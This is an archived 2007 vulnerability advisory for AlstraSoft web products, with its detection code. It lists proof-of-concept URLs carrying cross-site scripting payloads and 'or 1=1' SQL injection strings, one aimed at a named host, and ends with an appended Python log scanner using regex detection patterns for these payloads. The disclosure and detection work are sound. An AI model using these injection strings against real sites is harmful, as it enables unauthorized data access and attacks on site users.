
alstrasoft-multi.txt
Posted Jul 23, 2007
Authored by Lostmon | Site lostmon.blogspot.com

A number of cross site scripting and SQL injection vulnerabilities affect various products from AlstraSoft including Video Share Enterprise, Text Ads Enterprise, SMS Text Messaging Enterprise, Affiliate Network Pro, Article Manager Pro, and AskMe Pro.

tags | exploit, vulnerability, xss, sql injection
SHA-256 | dc6daac339055624b32c31104884c5c2c701f74e23323cec7c2aa98c2ad180d5

####################################################
AlstraSoft Multiple products multiple Vulnerabilities
Vendor URL: http://www.alstrasoft.com/products.htm
Advisory URL: http://lostmon.blogspot.com/2007/07/alstrasoft-multiple-products-multiple.html
Vendor notified: yes (webform) Exploit included: yes
####################################################



Multiple AlstraSoft products are vulnerable
to cross-site scripting and SQL injection style attacks.



################
examples
################

To exploit some of the flaws you need to be logged in.
Many other variables are affected in all products :S

#####################################
AlstraSoft Video Share Enterprise
#####################################


http://[Victim]/videoshare/view_video.php?viewkey=9c1d0e3b9ccc3ab651bc&msg=Your+feature+request+is+sent+"><script>alert()</script>

http://[Victim]/videoshare/view_video.php?viewkey=9c1d0e3b9ccc3ab651bc&page=10">&viewtype=&category=mr

http://[Victim]/videoshare/view_video.php?viewkey=9c1d0e3b9ccc3ab651bc"><script>alert()</script>

http://[Victim]/videoshare/signup.php?next=upload"><script>alert()</script>

http://[Victim]/videoshare/search_result.php?search_id=ghgdgdfd"><script>alert()</script>

http://[Victim]/videoshare/view_video.php?viewkey=d9607ee5a9d336962c53&page=1&viewtype=">&category=mr

http://[Victim]/videoshare/video.php?category=tf"><script>alert()</script>&viewtype=

http://[Victim]/videoshare/video.php?page=5"><script>alert()</script>

http://[Victim]/videoshare/compose.php?receiver=demo"><script>alert()</script>

http://[Victim]/videoshare/groups.php?b=ra&catgy=Recently%20Added"><script>alert()</script>


http://[Victim]/videoshare/siteadmin/channels.php?a=Search&channelid=&channelname=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&search=Search

http://[Victim]/videoshare/siteadmin/muser.php?email=sanam11sa@hotmail.com&uname=GLAMOROUS"><script>alert()</script>


Path disclosure:

http://[Victim]/videoshare/uprofile.php?UID=53"><script>alert()</script>

http://[Victim]/videoshare/channel_detail.php?chid=24"><script>alert()</script>

http://[Victim]/videoshare/uvideos.php?UID=53"><script>alert()</script>

http://[Victim]/videoshare/view_video.php?viewkey=d9607ee5a9d336962c53&page=1&viewtype=&category=mr'

http://[Victim]/videoshare/groups_home.php?urlkey=RSL"><script>alert()</script>

http://[Victim]/videoshare/ufriends.php?UID=253"><script>alert()</script>

SQL injection:

http://[Victim]/videoshare/gmembers.php?urlkey=gshahzad&gid=9%20or%201=1

http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1
http://[Victim]/videoshare/ugroups.php?UID=253%20or%201=1
http://[Victim]/videoshare/uprofile.php?UID=253%20or%201=1
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=public
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=private
http://[Victim]/videoshare/ufavour.php?UID=253 or 1=1
http://[Victim]/videoshare/ufriends.php?UID=253 or 1=1
http://[Victim]/videoshare/uplaylist.php?UID=253 or 1=1
http://[Victim]/videoshare/ugroups.php?UID=253 or 1=1



###########################################
AlstraSoft Text Ads Enterprise
###########################################

http://[Victim]/ads/forgot_uid.php?r=1"><script>alert()</script>

http://[Victim]/ads/search_results.php?query="><script>alert()</script>

http://[Victim]/ads/search_results.php?query=lala&sk=AlexaRating"><script>alert()</script>

http://[Victim]/ads/website_page.php?pageId=1004"><script>alert()</script>


#########################################
AlstraSoft SMS Text Messaging Enterprise
#########################################


http://[Victim]/admin/membersearch.php?pagina=17&q=la&domain=Walltrapas.es%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E

http://[Victim]/admin/edituser.php?userid=Walltrapas"><script>alert()</script>

http://[Victim]/admin/membersearch.php?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&B1=Submit


#################################################
e-friends
#################################################

http://alstrahost.com/friends/index.php?mode=people_card&p_id=927"><script>alert()</script>

This is a persistent XSS.


########################################
AlstraSoft Affiliate Network Pro
########################################

http://[Victim]/affiliate/merchants/index.php?Act=programedit&mode=edit&id=42"><script>alert()</script>

http://[Victim]/affiliate/merchants/index.php?Act=programedit&mode=edit&id=42&msg=Program%20Edited%20Successfully"><script>alert()</script>

http://[Victim]/affiliate/merchants/index.php?Act=uploadProducts&pgmid=41%20or%201=1 // SQL and XSS

http://[Victim]/affiliate/merchants/index.php?Act=daily&d=9&m=07&y=2007 // all variables XSS affected except Act

http://[Victim]/affiliate/merchants/index.php?Act=ProgramReport&programs=All&err=Please%20Enter%20Valid%20Date"><script>alert()</script>

http://[Victim]/affiliate/merchants/index.php?Act=LinkReport&sub=View&i=1&txtto=17/07/2007&txtfrom=12/07/2007&programs=All // all variables XSS affected except Act and sub

http://[Victim]/affiliate/merchants/temp.php?rowid=5"><script>alert()</script> // possible SQL too

http://[Victim]/affiliate/merchants/index.php?Act=add_money&msg=Please%20Enter%20A%20valid%20amount"><script>alert()</script>&modofpay=Authorize.net&bankname=&bankno=&bankemail=&bankaccount=&payableto=&minimumcheck=&affiliateid=

####################################
AlstraSoft Article Manager Pro
####################################

http://[Victim]/article/contact_author.php?userid=1%20"><script>alert()</script>

#######################################
AlstraSoft AskMe Pro
#######################################

http://[Victim]/ask/forum_answer.php?que_id=85%20or%201=1 // SQL

http://[Victim]/ask/search.php?cat_id=14-18%20or%201=1 // SQL

http://[Victim]/ask/search.php?status=Pending&cat_id="><script>alert()</script>
http://[Victim]/ask/search.php?status=Pending&cat_id=1%20or%201=1 // SQL
http://[Victim]/ask/register.php?typ=expert"><script>alert()</script>

###################### €nd ########################
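A defender-side check covering both vulnerability classes listed above, added here as an example and not part of Lostmon's advisory: it parses combined-format access log lines, percent-decodes each query parameter, and flags the attribute-breakout XSS payloads and the `or 1=1` tautologies shown in the PoC URLs. The parameter names come from the advisory; the log lines are constructed samples, not real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory shows feeding SQL queries; they should only ever be integers.
NUMERIC_PARAMS = {"UID", "gid", "pgmid", "rowid", "que_id", "cat_id", "pageId", "id", "p_id"}

# Attribute breakout ("> or '>) or an HTML tag inside a decoded parameter value.
XSS_RE = re.compile(r'["\']\s*>|<\s*/?\s*[a-z][\w-]*[\s>/]', re.I)
# Boolean tautology tail such as "253 or 1=1" appended to an id value.
SQLI_RE = re.compile(r'\b(?:or|and)\s+\d+\s*=\s*\d+\b', re.I)
# Apache/nginx combined log: client ip first, request line in the first quoted field.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')

def scan_target(target):
    """Return (kind, param, decoded_value) findings for one request target."""
    findings = []
    # parse_qsl percent-decodes and turns '+' into spaces, so %22%3E... becomes "><...
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if XSS_RE.search(value):
            findings.append(("xss", name, value))
        if SQLI_RE.search(value):
            findings.append(("sqli", name, value))
        elif name in NUMERIC_PARAMS and value and not value.isdigit():
            # Non-numeric id: the application should have rejected it before any query.
            findings.append(("non_numeric_id", name, value))
    return findings

def scan_log(lines):
    """Return (ip, path, kind, param) for every suspicious parameter in the log."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = urlsplit(m["target"]).path
        for kind, param, _ in scan_target(m["target"]):
            hits.append((m["ip"], path, kind, param))
    return hits

# Constructed sample log lines (not from any real server) mirroring the advisory's request shapes.
SAMPLE_LOG = """\
203.0.113.5 - - [23/Jul/2007:10:01:02 +0000] "GET /videoshare/view_video.php?viewkey=9c1d0e3b9ccc3ab651bc&page=1&viewtype=&category=mr HTTP/1.1" 200 5120
203.0.113.9 - - [23/Jul/2007:10:01:07 +0000] "GET /videoshare/uvideos.php?UID=253%20or%201=1&type=public HTTP/1.1" 200 9870
203.0.113.9 - - [23/Jul/2007:10:01:11 +0000] "GET /videoshare/search_result.php?search_id=ghgdgdfd%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E HTTP/1.1" 200 4011
203.0.113.9 - - [23/Jul/2007:10:01:15 +0000] "GET /ask/search.php?status=Pending&cat_id=14-18%20or%201=1 HTTP/1.1" 200 3300
""".splitlines()

if __name__ == "__main__":
    print(*scan_log(SAMPLE_LOG), sep="\n")
```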

Thnx to estrella for being my light.
Thnx to all Lostmon Team !!!

--
sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)

--
Curiosity is what sets the mind in motion....